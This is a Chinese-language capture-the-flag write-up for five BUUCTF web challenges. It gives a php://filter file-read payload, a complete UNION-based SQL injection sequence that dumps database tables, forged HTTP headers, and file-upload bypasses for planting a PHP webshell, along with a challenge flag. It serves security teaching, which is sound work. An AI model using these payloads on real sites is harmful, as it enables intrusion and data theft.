BUU Web wp[9-16]

BUU Web方向题解 9-16

[极客大挑战 2019]Secret File

解题思路

打开网站,发现什么都没有,f12查看源码,发现href:Archive_room.php

BUU Web wp[9-16]_第1张图片
查看Archive_room.php
BUU Web wp[9-16]_第2张图片点击SECRET,直接跳转到end.php

BUU Web wp[9-16]_第3张图片根据提示抓包查看中间过程的包,发现隐藏界面secr3t.php
BUU Web wp[9-16]_第4张图片访问secr3t.php
BUU Web wp[9-16]_第5张图片根据提示,需要读取flag.php,而../被过滤,再加上input和data被过滤,自然想到php://filter读取文件
secr3t.php?file=php://filter/read=convert.base64-encode/resource=flag.php

flag.php解码可得flag
BUU Web wp[9-16]_第6张图片

总结

  • 没有思路的时候就查看href寻找线索
  • 线索断了可以尝试查看流量进行分析

[极客大挑战 2019]LoveSQL

解题思路

万能密码测试,回显密码,因此在password注入:
BUU Web wp[9-16]_第7张图片

# 判断注入类型:字符型
1  不报错
1' 报错
# 判断字段数:3
1' order by 3# 不报错
1' order by 4#  报错
# 判断回显位置:第三个位置
1' union select 1,2,3#
# 查数据库名:geek
1' union select 1,2,database()#
# 查表名:geekuser,l0ve1ysq1
1' union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema='geek')#
# 查字段:id,username,password
1' union select 1,2,(select group_concat(column_name) from information_schema.columns where table_schema='geek' and table_name='l0ve1ysq1')#
# 查询数据:flag{98012190-4652-46f4-85fa-b02d9c539c15}
1' union select 1,2,(select group_concat(id,username,password) from l0ve1ysq1)#

总结

其实找到注入点用sqlmap就可以了,没有任何过滤非常简单,唯一注意的是根据回显的内容来寻找注入点。

[极客大挑战 2019]Knife

解题思路

打开如题,白给的shell,直接菜刀或者蚁剑连就是了,但是比较麻烦,我这里用Max Hackbar POST了:
BUU Web wp[9-16]_第8张图片BUU Web wp[9-16]_第9张图片

总结

注意加分号

[极客大挑战 2019]Http

解题思路

查看网页源码,发现Secret.php
Secret.php
访问Secret.php
Referer伪造Referer字段
BUU Web wp[9-16]_第10张图片
伪造user-agent
BUU Web wp[9-16]_第11张图片
伪造X-Forwarded-for
BUU Web wp[9-16]_第12张图片

总结

referer:代表从哪里来到当前页面进行访问的
User-Agent:是消息头,可以在该消息头内了解到该网站所支持的浏览器同时可以知道访问该网站所用的浏览器以及浏览器版本,还能了解登录用的操作系统以及系统是多少位的
X_Forwarded_for:可以用来伪造ip地址进行侵入,再填写一个公网地址,限制ip地址访问可以设置X_Forwarded_for的ip127.0.0.1进行侵入。

[极客大挑战 2019]Upload

解题思路

先上传一个基本小马:
BUU Web wp[9-16]_第13张图片f12查看源码,没有发现相关的文件类型判断,抓包,修改为
Content-Type: image/jpeg

BUU Web wp[9-16]_第14张图片
猜测是对php文件类型过滤,依次尝试php3、php4、php5、phtml,发现phtml可以绕过
BUU Web wp[9-16]_第15张图片
使用script标签绕过
BUU Web wp[9-16]_第16张图片
推测检测文件头,加个GIF89a,上传成功
BUU Web wp[9-16]_第17张图片
蚁剑连接或者POST数据都行
flag

总结

文件头检测:GIF89a
文件类型检测:image/jpeg
文件后缀检测:php、php3、php4、php5、phtml
文件内容检测:

你可能感兴趣的:(BUU,Web,web安全)